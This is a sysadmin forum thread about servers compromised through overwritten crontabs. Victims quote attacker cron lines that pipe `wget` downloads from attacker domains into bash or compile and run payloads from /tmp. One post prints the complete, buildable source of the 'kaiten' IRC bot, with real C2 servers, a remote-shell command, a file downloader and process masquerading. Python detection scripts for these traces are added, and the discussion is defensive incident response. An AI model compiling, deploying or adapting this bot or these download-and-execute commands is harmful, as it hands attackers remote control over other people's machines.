Some asshole tried to access my servers and run this (they couldn't)

gistfile1.txt
crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k

Hi,

I have been getting the same message from my server for 3 days; any ideas on how to block this attempt?

Hi,

I have the same problem.. (1 day ago)

I found just this (in syslog):

May 24 17:24:15 localhost crontab[27812]: (my_login) DELETE (my_login)
May 24 17:24:15 localhost crontab[27818]: (my_login) LIST (my_login)
May 24 17:24:15 localhost crontab[27817]: (my_login) REPLACE (my_login)
May 24 17:24:16 localhost crontab[27821]: (my_login) DELETE (my_login)
May 24 17:24:16 localhost crontab[27827]: (my_login) LIST (my_login)
May 24 17:24:16 localhost crontab[27826]: (my_login) REPLACE (my_login)

At the moment, I don't understand how he could do that...
Via SSH is impossible, because I use a private key with a password (PasswordAuthentication no).


I think the man has access because he uploaded these files without me noticing (for me: "k.c" & "sh.py").
He also ran a process "than.pid" with the fake name "- bash".

Be careful.
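An added example, not part of the thread: a Python checker for the two artefacts reported above. It parses a crontab and flags entries that fetch something from the network and pipe it into a shell, drop it into /tmp or /var/tmp and execute it, or compile code on the fly; and it scans syslog for a crontab DELETE followed within seconds by a REPLACE for the same user, which is what `crontab -r` followed by `(crontab -l; echo ...) | crontab -` leaves behind (the LIST in between is the `crontab -l`). The crontab sample is built from the three entries quoted in this thread; the syslog sample is the six lines above. The reason strings and the five-second window are my own choices.

```python
"""Flag download-and-execute crontab entries and crontab rewrite bursts in syslog."""
import re
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed sample: the three crontab entries quoted in this thread, as one crontab.
SAMPLE_CRONTAB = """# m h dom mon dow command
1 * * * * wget -O /var/tmp/k.c 188.190.124.120/kaiten-src.c && gcc -o /var/tmp/ka /var/tmp/k.c && chmod +x /var/tmp/ka && /var/tmp/ka
1 * * * * wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k
1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget  -O - ddos.cat.com/cmd3|bash;
"""

# The six syslog lines posted above, as a sample input.
SAMPLE_SYSLOG = """May 24 17:24:15 localhost crontab[27812]: (my_login) DELETE (my_login)
May 24 17:24:15 localhost crontab[27818]: (my_login) LIST (my_login)
May 24 17:24:15 localhost crontab[27817]: (my_login) REPLACE (my_login)
May 24 17:24:16 localhost crontab[27821]: (my_login) DELETE (my_login)
May 24 17:24:16 localhost crontab[27827]: (my_login) LIST (my_login)
May 24 17:24:16 localhost crontab[27826]: (my_login) REPLACE (my_login)
""".splitlines()

# Shapes seen in this thread: fetch to stdout and pipe into a shell, or fetch into a
# world-writable temp dir, chmod it and run it (optionally compiling it first).
FETCH_TO_SHELL = re.compile(r'\b(?:wget|curl)\b[^|;]*\|\s*(?:ba|z|k|da)?sh\b')
FETCH_TO_TMP = re.compile(r'\b(?:wget|curl)\b[^;&|]*(?:/tmp|/var/tmp|/dev/shm)/\S+')
EXEC_FROM_TMP = re.compile(r'(?:^|[;&|]\s*)(?:/tmp|/var/tmp|/dev/shm)/\S+')
COMPILER = re.compile(r'\b(?:gcc|cc|tcc)\b')
SYSLOG_CRONTAB = re.compile(
    r'^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ crontab\[\d+\]: '
    r'\((?P<user>[^)]+)\) (?P<op>DELETE|LIST|REPLACE)')


def parse_crontab(text: str) -> List[Tuple[str, str]]:
    """Return (schedule, command) pairs; skips comments, blanks and VAR=value lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('#') or re.match(r'^[A-Za-z_][A-Za-z0-9_]*=', line):
            continue
        fields = line.split(None, 5)
        if line.startswith('@') and len(fields) >= 2:        # @hourly, @reboot, ...
            entries.append((fields[0], ' '.join(fields[1:])))
        elif len(fields) == 6:                                # five time fields + command
            entries.append((' '.join(fields[:5]), fields[5]))
    return entries


def suspicious_cron_entries(text: str) -> List[Dict[str, object]]:
    """Each finding carries the entry and every reason that fired."""
    findings = []
    for schedule, command in parse_crontab(text):
        reasons = []
        if FETCH_TO_SHELL.search(command):
            reasons.append('remote script piped into a shell')
        if FETCH_TO_TMP.search(command):
            reasons.append('download into a temp directory')
        if EXEC_FROM_TMP.search(command):
            reasons.append('executes a file from a temp directory')
        if COMPILER.search(command):
            reasons.append('compiles code at run time')
        if reasons:
            findings.append({'schedule': schedule, 'command': command, 'reasons': reasons})
    return findings


def crontab_rewrite_bursts(lines: List[str], window_seconds: int = 5,
                           year: int = 2013) -> List[Dict[str, object]]:
    """DELETE then REPLACE for the same user inside the window. Syslog lines carry
    no year, so the caller supplies it (assumed 2013 here, the year of the thread)."""
    last_delete: Dict[str, datetime] = {}
    bursts = []
    for line in lines:
        m = SYSLOG_CRONTAB.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m.group('ts')}", '%Y %b %d %H:%M:%S')
        user, op = m.group('user'), m.group('op')
        if op == 'DELETE':
            last_delete[user] = ts
        elif op == 'REPLACE' and user in last_delete and \
                ts - last_delete[user] <= timedelta(seconds=window_seconds):
            bursts.append({'user': user, 'deleted_at': last_delete.pop(user), 'replaced_at': ts})
    return bursts


if __name__ == '__main__':
    for f in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f['schedule'], '->', '; '.join(f['reasons']))
    for b in crontab_rewrite_bursts(SAMPLE_SYSLOG):
        print(b['user'], 'crontab wiped and replaced at', b['replaced_at'])
```

Run it against `crontab -l -u <user>` output for every user in /etc/passwd, not only root: the thread's payload lands in whichever user's crontab the web application runs as.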

I have the same problem!

This is really CRAZY! How is it even possible that someone can get into the servers?
I have the same issue too.

The server crontab is being overridden with this:

 1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget  -O - ddos.cat.com/cmd3|bash;

This has happened twice in the last 3 days. Not sure how anyone can get into the server and do this.

In which data center are you seeing this issue? Ours is on Linode.
Hope it's not related to the security concerns that happened a few weeks ago.

What did you do to fix that?

Hi,

I have a personal server at home; I'm not using any data center.

I really don't know how this man got into the server, and I can't believe it was via SSH... I'm going to look at every log on my server. I suspect the guy used the HTTP protocol, but I'm really not sure.

At the moment, I haven't fixed it, and I'm thinking of reinstalling my system to be sure to reset all access and remove any suspicious programs.

Can you tell me briefly what you mean by "security concerns"? I wonder if he managed to get access through one of my WordPress websites. Do you have any websites (WordPress type)?

Check your temporary folders (/var/tmp, /tmp, ...), because I saw suspicious program files with fake creation dates...

Thanks

Do you have a Redmine?

Hi,

We have the same problem on customer servers dedicated to a custom Ruby on Rails application.
I have noticed different crontabs during the past four days (since the 23rd of May).

On 2013-05-23:

1 * * * wget -O /var/tmp/k.c 188.190.124.120/kaiten-src.c && gcc -o /var/tmp/ka /var/tmp/k.c && chmod +x /var/tmp/ka && /var/tmp/ka

On 2013-05-24:
1 * * * * wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k

Today:
1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;

I suspect (but I have no clue ^^) that the root vulnerability which gives access to the server might be related to Ruby on Rails. We are using:

  • Ruby 1.9.3 p327
  • Ruby On Rails 3.2.11

And we haven't managed to update our servers because we are still in heavy development mode.

We tried changing the root password as a quick fix, but it didn't stop the attacker (I am not even sure that he needs/uses root access, as he overrides the user-level crontab...).

Regards.

Here is the code of kaiten-src.c, a kind of botnet agent which has been uploaded and run repeatedly since the first crontab intrusion:

////////////////////////////////////////////////////////////////////////////////
// EDIT THESE //
////////////////////////////////////////////////////////////////////////////////
#undef STARTUP              // Start on startup?
#undef IDENT                // Only enable this if you absolutely have to
#define FAKENAME "- bash"   // What you want this to hide as
#define CHAN "#rails"       // Channel to join
#define TEMPDIR "/var/tmp"  // Where to save generated ips text file
#define KEY ""              // The key of the channel
#define VERSION "0.1"       // dfnctsc-kaiten release version
#define PORT 6667           // Port of server(s)
int numservers = 1;         // Must change this to equal number of servers down there
char *servers[] = {         // List the servers in that format, always end in (void)0
    "cvv4you.ru",
    "188.190.124.120",
    (void*) 0
};
////////////////////////////////////////////////////////////////////////////////
// STOP HERE! //
////////////////////////////////////////////////////////////////////////////////
/* Restoration note: the header names after each "#include" and the pointer
   asterisks (char *, case '*', "*", (fd_set *) 0, ...) were eaten when this
   comment was rendered; they are put back from what the code itself uses.
   The sample's behaviour is otherwise left exactly as posted. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <ctype.h>
#include <stdarg.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <signal.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/time.h>
#include <sys/ioctl.h>
#include <sys/file.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

int sock, changeservers = 0;
char *server, *chan, *key, *nick, *ident, *user, execfile[256], dispass[256];
unsigned int *pids;
unsigned long spoofs = 0, spoofsm = 0, numpids = 0, running = 0;

// Case-insensitive glob match ('*' and '?'); returns 0 on a match.
int strwildmatch(const char* pattern, const char* string) {
    switch (*pattern) {
        case '\0': return *string;
        case '*': return !(!strwildmatch(pattern + 1, string) || *string && !strwildmatch(pattern, string + 1));
        case '?': return !(*string && !strwildmatch(pattern + 1, string + 1));
        default: return !((toupper(*pattern) == toupper(*string)) && !strwildmatch(pattern + 1, string + 1));
    }
}

int send_msg(int sock, char *words, ...) {
    static char textBuffer[1024];
    va_list args;
    va_start(args, words);
    vsprintf(textBuffer, words, args);
    va_end(args);
    return write(sock, textBuffer, strlen(textBuffer));
}

// fork() and remember the child's pid so the main loop can reap it.
int mfork(char *sender) {
    unsigned int parent, *newpids, i;
    parent = fork();
    if (parent <= 0) return parent;
    numpids++;
    newpids = (unsigned int *) malloc((numpids + 1) * sizeof (unsigned int));
    for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
    newpids[numpids - 1] = parent;
    free(pids);
    pids = newpids;
    return parent;
}

void filter(char *a) {
    while (a[strlen(a) - 1] == '\r' || a[strlen(a) - 1] == '\n') a[strlen(a) - 1] = 0;
}

// Random 9-letter uppercase string, used for the nick and the ident.
char *makestring() {
    char *tmp;
    int len = 9, i;
    tmp = (char *) malloc(len + 1);
    memset(tmp, 0, len + 1);
    for (i = 0; i < len; i++) tmp[i] = (rand() % (91 - 65)) + 65;
    return tmp;
}

// Clashes with the libc builtin: this is the "conflicting types for
// built-in function 'pow'" warning that shows up in the error log below.
long pow(long a, long b) {
    if (b == 0) return 1;
    if (b == 1) return a;
    return a * pow(a, b - 1);
}

u_short in_cksum(u_short *addr, int len) {
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;
    while (nleft > 1) {
        sum += *w++;
        nleft -= 2;
    }
    if (nleft == 1) {
        *(u_char *) (&answer) = *(u_char *) w;
        sum += answer;
    }
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    answer = ~sum;
    return (answer);
}

// !GET <url> <file>: plain HTTP/1.0 download to disk, reported back to the channel.
void get(int sock, char *sender, int argc, char **argv) {
    int sock2, i, d;
    struct sockaddr_in server;
    unsigned long ipaddr;
    char buf[1024];
    FILE *file;
    unsigned char bufm[4096];
    if (mfork(sender) != 0) return;
    if (argc < 2) {
        send_msg(sock, "PRIVMSG %s :GET \n", sender);
        exit(0);
    }
    if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        send_msg(sock, "PRIVMSG %s :Unable to create socket.\n", sender);
        exit(0);
    }
    if (!strncmp(argv[1], "http://", 7)) strcpy(buf, argv[1] + 7);
    else strcpy(buf, argv[1]);
    for (i = 0; i < strlen(buf) && buf[i] != '/'; i++);
    buf[i] = 0;
    server.sin_family = AF_INET;
    server.sin_port = htons(80);
    if ((ipaddr = inet_addr(buf)) == -1) {
        struct hostent *hostm;
        if ((hostm = gethostbyname(buf)) == NULL) {
            send_msg(sock, "PRIVMSG %s :Unable to resolve address.\n", sender);
            exit(0);
        }
        memcpy((char *) &server.sin_addr, hostm->h_addr, hostm->h_length);
    } else server.sin_addr.s_addr = ipaddr;
    memset(&(server.sin_zero), 0, 8);
    if (connect(sock2, (struct sockaddr *) &server, sizeof (server)) != 0) {
        send_msg(sock, "PRIVMSG %s :Unable to connect to http.\n", sender);
        exit(0);
    }

    send_msg(sock2, "GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n", buf + i + 1, buf);
    send_msg(sock, "PRIVMSG %s :Receiving file.\n", chan);
    file = fopen(argv[2], "wb");
    while (1) {
        int i;
        if ((i = recv(sock2, bufm, 4096, 0)) <= 0) break;
        if (i < 4096) bufm[i] = 0;
        // skip the response headers; the body starts after the first blank line
        for (d = 0; d < i; d++) if (!strncmp((char *) bufm + d, "\r\n\r\n", 4)) {
            for (d += 4; d < i; d++) fputc(bufm[d], file);
            goto done;
        }
    }

done:
    send_msg(sock, "PRIVMSG %s :Saved as %s\n", chan, argv[2]);
    while (1) {
        int i, d;
        if ((i = recv(sock2, bufm, 4096, 0)) <= 0) break;
        if (i < 4096) bufm[i] = 0;
        for (d = 0; d < i; d++) fputc(bufm[d], file);
    }
    fclose(file);
    close(sock2);
    exit(0);
}

void nickc(int sock, char *sender, int argc, char **argv) {
    if (argc != 1) {
        send_msg(sock, "PRIVMSG %s :NICK \n", sender);
        return;
    }
    if (strlen(argv[1]) >= 10) {
        send_msg(sock, "PRIVMSG %s :Nick cannot be larger than 9 characters.\n", sender);
        return;
    }
    send_msg(sock, "NICK %s\n", argv[1]);
}

// Raw-packet header definitions left over from the full kaiten; this variant
// has no flood commands wired up, so they are unused.
struct iphdr {
    unsigned int ihl : 4, version : 4;
    unsigned char tos;
    unsigned short tot_len;
    unsigned short id;
    unsigned short frag_off;
    unsigned char ttl;
    unsigned char protocol;
    unsigned short check;
    unsigned long saddr;
    unsigned long daddr;
};

struct udphdr {
    unsigned short source;
    unsigned short dest;
    unsigned short len;
    unsigned short check;
};

struct tcphdr {
    unsigned short source;
    unsigned short dest;
    unsigned long seq;
    unsigned long ack_seq;
    unsigned short res1 : 4, doff : 4;
    unsigned char fin : 1, syn : 1, rst : 1, psh : 1, ack : 1, urg : 1, ece : 1, cwr : 1;
    unsigned short window;
    unsigned short check;
    unsigned short urg_ptr;
};

struct send_tcp {
    struct iphdr ip;
    struct tcphdr tcp;
    char buf[20];
};

struct pseudo_header {
    unsigned int source_address;
    unsigned int dest_address;
    unsigned char placeholder;
    unsigned char protocol;
    unsigned short tcp_length;
    struct tcphdr tcp;
    char buf[20];
};

unsigned int host2ip(char *sender, char *hostname) {
    static struct in_addr i;
    struct hostent *h;
    if ((i.s_addr = inet_addr(hostname)) == -1) {
        if ((h = gethostbyname(hostname)) == NULL) {
            send_msg(sock, "PRIVMSG %s :Unable to resolve %s\n", sender, hostname);
            exit(0);
        }
        bcopy(h->h_addr, (char *) &i.s_addr, h->h_length);
    }
    return i.s_addr;
}

// !SERVER <host>: switch C2 server; con() reconnects after the socket closes.
void move(int sock, char *sender, int argc, char **argv) {
    if (argc < 1) {
        send_msg(sock, "PRIVMSG %s :MOVE \n", sender);
        exit(1);
    }
    server = strdup(argv[1]);
    changeservers = 1;
    close(sock);
}

void killd(int sock, char *sender, int argc, char **argv) {
    kill(0, 9);
}

void help(int sock, char *sender, int argc, char **argv) {
    if (mfork(sender) != 0) return;
    send_msg(sock, "NOTICE %s :NICK = Changes the nick of the client\n", sender);
    send_msg(sock, "NOTICE %s :SERVER = Changes servers\n", sender);
    send_msg(sock, "NOTICE %s :KILL = Kills the client\n", sender);
    send_msg(sock, "NOTICE %s :GET = Downloads a file off the web and saves it onto the hd\n", sender);
    send_msg(sock, "NOTICE %s :HELP = Displays this\n", sender);
    send_msg(sock, "NOTICE %s :IRC = send_msgs this command to the server\n", sender);
    send_msg(sock, "NOTICE %s :SH = Executes a command\n", sender);
    exit(0);
}

// Command table for "!<nick-mask> <CMD> ..." lines spoken in the channel.
struct FMessages {
    char *cmd;
    void (*func)(int, char *, int, char **);
} flooders[] = {

    { "NICK", nickc},
    { "SERVER", move},
    { "GET", get},
    { "KILL", killd},
    { "HELP", help},

    { (char *) 0, (void (*)(int, char *, int, char **))0}

};

void _PRIVMSG(int sock, char *sender, char *str) {
    int i;
    char *to, *message;
    for (i = 0; i < strlen(str) && str[i] != ' '; i++);
    str[i] = 0;
    to = str;
    message = str + i + 2;
    for (i = 0; i < strlen(sender) && sender[i] != '!'; i++);
    sender[i] = 0;
    // only channel messages of the form "!<mask> <command>" where <mask> matches our nick
    if (*message == '!' && !strcasecmp(to, chan)) {
        char *params[12], name[1024] = {0};
        int num_params = 0, m;
        message++;
        for (i = 0; i < strlen(message) && message[i] != ' '; i++);
        message[i] = 0;
        if (strwildmatch(message, nick)) return;
        message += i + 1;
        if (!strncmp(message, "IRC ", 4)) send_msg(sock, "%s\n", message + 4);
        // !<mask> SH <command>: remote shell, output relayed line by line to the channel
        if (!strncmp(message, "SH ", 3)) {
            char buf[1024];
            FILE *command;
            if (mfork(sender) != 0) return;
            memset(buf, 0, 1024);
            sprintf(buf, "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s", message + 3);
            command = popen(buf, "r");
            while (!feof(command)) {
                memset(buf, 0, 1024);
                fgets(buf, 1024, command);
                send_msg(sock, "PRIVMSG %s :%s\n", chan, buf);
                sleep(1);
            }
            pclose(command);
            exit(0);
        }
        m = strlen(message);
        for (i = 0; i < m; i++) {
            if (*message == ' ' || *message == 0) break;
            name[i] = *message;
            message++;
        }
        for (i = 0; i < strlen(message); i++) if (message[i] == ' ') num_params++;
        num_params++;
        if (num_params > 10) num_params = 10;
        params[0] = name;
        params[num_params + 1] = "\0";
        m = 1;
        while (*message != 0) {
            message++;
            if (m >= num_params) break;
            for (i = 0; i < strlen(message) && message[i] != ' '; i++);
            params[m] = (char *) malloc(i + 1);
            strncpy(params[m], message, i);
            params[m][i] = 0;
            m++;
            message += i;
        }
        for (m = 0; flooders[m].cmd != (char *) 0; m++) {
            if (!strcasecmp(flooders[m].cmd, name)) {
                flooders[m].func(sock, sender, num_params - 1, params);
                for (i = 1; i < num_params; i++) free(params[i]);
                return;
            }
        }
    }
}

// 376 (end of MOTD) and 422 (no MOTD): join the channel.
void _376(int sock, char *sender, char *str) {
    send_msg(sock, "MODE %s -ix\n", nick);
    send_msg(sock, "JOIN %s :%s\n", chan, key);
    send_msg(sock, "WHO %s\n", nick);
}

void _PING(int sock, char *sender, char *str) {
    send_msg(sock, "PONG %s\n", str);
}

// 352 (WHO reply): learn our own public address from the server's view of us.
void _352(int sock, char *sender, char *str) {
    int i, d;
    char *msg = str;
    struct hostent *hostm;
    unsigned long m;
    for (i = 0, d = 0; d < 5; d++) {
        for (; i < strlen(str) && *msg != ' '; msg++, i++);
        msg++;
        if (i == strlen(str)) return;
    }
    for (i = 0; i < strlen(msg) && msg[i] != ' '; i++);
    msg[i] = 0;
    if (!strcasecmp(msg, nick) && !spoofsm) {
        msg = str;
        for (i = 0, d = 0; d < 3; d++) {
            for (; i < strlen(str) && *msg != ' '; msg++, i++);
            msg++;
            if (i == strlen(str)) return;
        }
        for (i = 0; i < strlen(msg) && msg[i] != ' '; i++);
        msg[i] = 0;
        if ((m = inet_addr(msg)) == -1) {
            if ((hostm = gethostbyname(msg)) == NULL) {
                send_msg(sock, "PRIVMSG %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n", sender);
                return;
            }
            memcpy((char *) &m, hostm->h_addr, hostm->h_length);
        }
        ((char*) &spoofs)[3] = ((char*) &m)[0];
        ((char*) &spoofs)[2] = ((char*) &m)[1];
        ((char*) &spoofs)[1] = ((char*) &m)[2];
        ((char*) &spoofs)[0] = 0;
        spoofsm = 256;
    }
}

// 433 (nick in use): pick another random nick.
void _433(int sock, char *sender, char *str) {
    free(nick);
    nick = makestring();
}

void _NICK(int sock, char *sender, char *str) {
    int i;
    for (i = 0; i < strlen(sender) && sender[i] != '!'; i++);
    sender[i] = 0;
    if (!strcasecmp(sender, nick)) {
        if (*str == ':') str++;
        if (nick) free(nick);
        nick = strdup(str);
    }
}

struct Messages {
    char *cmd;
    void (*func)(int, char *, char *);
} msgs[] = {
    { "352", _352},
    { "376", _376},
    { "433", _433},
    { "422", _376},
    { "PRIVMSG", _PRIVMSG},
    { "PING", _PING},
    { "NICK", _NICK},
    { (char *) 0, (void (*)(int, char *, char *))0}
};

// Connect to a C2 server (random pick unless !SERVER chose one); loops until it succeeds.
void con() {
    struct sockaddr_in srv;
    unsigned long ipaddr, start;
    int flag;
    struct hostent *hp;
start:
    sock = -1;
    flag = 1;
    if (changeservers == 0) server = servers[rand() % numservers];
    changeservers = 0;
    while ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0);
    if (inet_addr(server) == 0 || inet_addr(server) == -1) {
        if ((hp = gethostbyname(server)) == NULL) {
            server = NULL;
            close(sock);
            goto start;
        }
        bcopy((char *) hp->h_addr, (char*) &srv.sin_addr, hp->h_length);
    } else srv.sin_addr.s_addr = inet_addr(server);
    srv.sin_family = AF_INET;
    srv.sin_port = htons(PORT);
    ioctl(sock, FIONBIO, &flag);
    start = time(NULL);
    while (time(NULL) - start < 10) {
        errno = 0;
        if (connect(sock, (struct sockaddr *) &srv, sizeof (srv)) == 0 || errno == EISCONN) {
            setsockopt(sock, SOL_SOCKET, SO_LINGER, 0, 0);
            setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, 0, 0);
            setsockopt(sock, SOL_SOCKET, SO_KEEPALIVE, 0, 0);
            return;
        }
        if (!(errno == EINPROGRESS || errno == EALREADY)) break;
        sleep(1);
    }
    server = NULL;
    close(sock);
    goto start;
}

// Single-instance guard: an exclusive flock on /tmp/tan.pid. The "Lockfile found.
// Exiting." text (no newline) is what the repeated runs wrote into the error log below.
int lockfile() {
    int pid_file = open("/tmp/tan.pid", O_CREAT | O_RDWR, 0666);
    int rc = flock(pid_file, LOCK_EX | LOCK_NB);
    if (rc && EWOULDBLOCK == errno) {
        printf("Lockfile found. Exiting.");
        exit(0);
    }
    return rc;
}

int main(int argc, char **argv) {
    lockfile();
    int on, i;
    char cwd[256], *str;
    FILE *file;
#ifdef STARTUP
    str = "/etc/rc.d/rc.local";
    file = fopen(str, "r");
    if (file == NULL) {
        str = "/etc/rc.conf";
        file = fopen(str, "r");
    }
    if (file != NULL) {
        char outfile[256], buf[1024];
        int i = strlen(argv[0]), d = 0;
        getcwd(cwd, 256);
        if (strcmp(cwd, "/")) {
            while (argv[0][i] != '/') i--;
            sprintf(outfile, "\"%s%s\"\n", cwd, argv[0] + i);
            while (!feof(file)) {
                fgets(buf, 1024, file);
                if (!strcasecmp(buf, outfile)) d++;
            }
            if (d == 0) {
                FILE *out;
                fclose(file);
                out = fopen(str, "a");
                if (out != NULL) {
                    fputs(outfile, out);
                    fclose(out);
                }
            } else fclose(file);
        } else fclose(file);
    }
#endif
    if (fork()) exit(0);
#ifdef FAKENAME
    // overwrite argv[0] in place so ps shows "- bash"; the real path is still in /proc/<pid>/exe
    strncpy(argv[0], FAKENAME, strlen(argv[0]));
    for (on = 1; on < argc; on++) memset(argv[on], 0, strlen(argv[on]));
#endif
    srand((time(NULL) ^ getpid()) + getppid());
    nick = makestring();
    ident = makestring();
    user = "raft";
    chan = CHAN;
    key = KEY;
    server = NULL;
sa:
#ifdef IDENT
    for (i = 0; i < numpids; i++) {
        if (pids[i] != 0 && pids[i] != getpid()) {
            kill(pids[i], 9);
            waitpid(pids[i], NULL, WNOHANG);
        }
    }
    pids = NULL;
    numpids = 0;
    identd();
#endif
    con();
    send_msg(sock, "NICK %s\nUSER %s localhost localhost :%s\n", nick, ident, user);
    while (1) {
        unsigned long i;
        fd_set n;
        struct timeval tv;
        FD_ZERO(&n);
        FD_SET(sock, &n);
        tv.tv_sec = 60 * 20;
        tv.tv_usec = 0;
        if (select(sock + 1, &n, (fd_set *) 0, (fd_set *) 0, &tv) <= 0) goto sa;
        for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
            unsigned int *newpids, on;
            for (on = i + 1; on < numpids; on++) pids[on - 1] = pids[on];
            pids[on - 1] = 0;
            numpids--;
            newpids = (unsigned int *) malloc((numpids + 1) * sizeof (unsigned int));
            for (on = 0; on < numpids; on++) newpids[on] = pids[on];
            free(pids);
            pids = newpids;
        }
        if (FD_ISSET(sock, &n)) {
            char buf[4096], *str;
            int i;
            if ((i = recv(sock, buf, 4096, 0)) <= 0) goto sa;
            buf[i] = 0;
            str = strtok(buf, "\n");
            while (str && *str) {
                char name[1024], sender[1024];
                filter(str);
                if (*str == ':') {
                    for (i = 0; i < strlen(str) && str[i] != ' '; i++);
                    str[i] = 0;
                    strcpy(sender, str + 1);
                    strcpy(str, str + i + 1);
                } else strcpy(sender, "*");
                for (i = 0; i < strlen(str) && str[i] != ' '; i++);
                str[i] = 0;
                strcpy(name, str);
                strcpy(str, str + i + 1);
                for (i = 0; msgs[i].cmd != (char *) 0; i++) if (!strcasecmp(msgs[i].cmd, name)) msgs[i].func(sock, sender, str);
                if (!strcasecmp(name, "ERROR")) goto sa;
                str = strtok((char *) NULL, "\n");
            }
        }
    }
    return 0;
}
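An added triage script, not from the thread or from the malware's author, for hunting this bot on a Linux host using the three traits its source fixes: argv[0] overwritten with FAKENAME "- bash" (while /proc/<pid>/exe still points at the real binary), the exclusive flock on /tmp/tan.pid, and an outbound TCP connection to PORT 6667. It reads /proc directly when run, but every check also takes its input as an argument so the constructed /proc/net/tcp sample below (one ESTABLISHED socket to the second server in the source's list) can be checked offline. The set of shell names and the port set are my assumptions.

```python
"""Host triage for the kaiten variant above: masqueraded argv[0], held lockfile, IRC socket."""
import fcntl
import os
import re
from typing import Dict, List, Optional

TEMP_DIRS = ('/tmp/', '/var/tmp/', '/dev/shm/')
SHELL_NAME = re.compile(r'^-?\s*(?:ba|da|z|k)?sh$')   # "- bash", "-bash", "bash", "sh"
LOCKFILE = '/tmp/tan.pid'                              # open()+flock(LOCK_EX) in lockfile()
IRC_PORTS = {6667, 6697}                               # PORT in the source is 6667

# Constructed /proc/net/tcp excerpt: one ESTABLISHED (st=01) socket from 10.0.0.5 to
# 188.190.124.120:6667. Addresses are little-endian hex, port is big-endian hex.
SAMPLE_NET_TCP = """  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0500000A:9C40 787CBEBC:1A0B 01 00000000:00000000 00:00000000 00000000  1000        0 12345 1 0000000000000000 20 4 30 10 -1
   1: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 9999 1 0000000000000000 100 0 0 10 0
"""


def process_looks_masqueraded(cmdline: str, exe: Optional[str]) -> bool:
    """argv[0] claims to be a shell, but the executable is gone or lives in a temp dir.
    cmdline is the NUL-separated /proc/<pid>/cmdline; exe is the readlink of /proc/<pid>/exe."""
    argv0 = cmdline.split('\0', 1)[0].strip() if cmdline else ''
    if not SHELL_NAME.match(argv0):
        return False
    if exe is None or exe.endswith(' (deleted)'):
        return True
    return exe.startswith(TEMP_DIRS)


def scan_proc(proc_root: str = '/proc') -> List[Dict[str, object]]:
    """Walk /proc; processes we cannot read (other users' exe links) are skipped."""
    hits = []
    for pid in filter(str.isdigit, os.listdir(proc_root)):
        base = os.path.join(proc_root, pid)
        try:
            with open(os.path.join(base, 'cmdline'), 'rb') as f:
                cmdline = f.read().decode('latin-1')
        except OSError:
            continue
        try:
            exe = os.readlink(os.path.join(base, 'exe'))
        except OSError:
            exe = None
        if process_looks_masqueraded(cmdline, exe):
            hits.append({'pid': int(pid), 'argv0': cmdline.split('\0')[0], 'exe': exe})
    return hits


def lockfile_held(path: str = LOCKFILE) -> Optional[bool]:
    """True if some process holds the bot's exclusive flock (a copy is alive), False if the
    file exists but is unlocked (a stale drop), None if it does not exist. A shared,
    non-blocking lock is enough to probe and does not disturb anything."""
    if not os.path.exists(path):
        return None
    fd = os.open(path, os.O_RDONLY)
    try:
        try:
            fcntl.flock(fd, fcntl.LOCK_SH | fcntl.LOCK_NB)
        except BlockingIOError:
            return True
        fcntl.flock(fd, fcntl.LOCK_UN)
        return False
    finally:
        os.close(fd)


def irc_connections(net_tcp_text: str, ports=IRC_PORTS) -> List[Dict[str, object]]:
    """ESTABLISHED sockets whose remote port is an IRC port. Column 9 is the socket inode,
    which you can map to a pid via /proc/<pid>/fd/* links. Assumes a little-endian host."""
    out = []
    for line in net_tcp_text.splitlines()[1:]:
        f = line.split()
        if len(f) < 10 or f[3] != '01':
            continue
        rip_hex, rport_hex = f[2].split(':')
        rport = int(rport_hex, 16)
        if rport in ports:
            ip = '.'.join(str(int(rip_hex[i:i + 2], 16)) for i in (6, 4, 2, 0))
            out.append({'remote': f'{ip}:{rport}', 'inode': int(f[9])})
    return out


if __name__ == '__main__':
    print('masqueraded processes:', scan_proc())
    print('lockfile held:', lockfile_held())
    with open('/proc/net/tcp') as fh:
        print('IRC connections:', irc_connections(fh.read()))
```

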